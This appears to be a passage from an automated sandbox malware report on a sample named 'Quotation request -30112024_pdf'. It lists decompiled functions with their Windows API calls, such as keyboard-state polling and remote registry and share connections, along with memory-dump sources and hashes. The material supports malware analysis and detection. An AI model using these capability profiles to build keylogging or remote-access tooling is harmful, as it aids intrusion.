                                                                    • Opcode Fuzzy Hash: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                                    • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                    Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                    Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                    Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                    • String ID:
                                                                    • API String ID: 3218148540-0
                                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                    Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                    • String ID:
                                                                    • API String ID: 136442275-0
                                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                    Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • _wcstok.LIBCMT ref: 004674FF
                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                    • String ID: X
                                                                    • API String ID: 3104067586-3081909835
                                                                    • Opcode ID: f80725d52a327de87f082f069484d687ce30e32218087a7638b870579c23d994
                                                                    • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                    • Opcode Fuzzy Hash: f80725d52a327de87f082f069484d687ce30e32218087a7638b870579c23d994
                                                                    • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                    Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                    • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                    • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                    • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                    • _wcslen.LIBCMT ref: 0046CDB0
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                    • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                      • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                      • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                      • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 0046CEA6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 440038798-2785691316
                                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                    Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                    • _wcslen.LIBCMT ref: 004610A3
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                    • GetWindowRect.USER32(?,?), ref: 00461248
                                                                      • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                    • String ID: ThumbnailClass
                                                                    • API String ID: 4136854206-1241985126
                                                                    • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                    • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                    • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                    • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                    Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                    • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                    • String ID: 2
                                                                    • API String ID: 1331449709-450215437
                                                                    • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                    • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                    • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                    • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                    Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                    • API String ID: 3054410614-2561132961
                                                                    • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                    • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                    • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                    • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                    Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                    • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                    • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 600699880-22481851
                                                                    • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                    • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                    • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                    • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                    Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyWindow
                                                                    • String ID: static
                                                                    • API String ID: 3375834691-2160076837
                                                                    • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                    • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                    • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                    • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                    Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
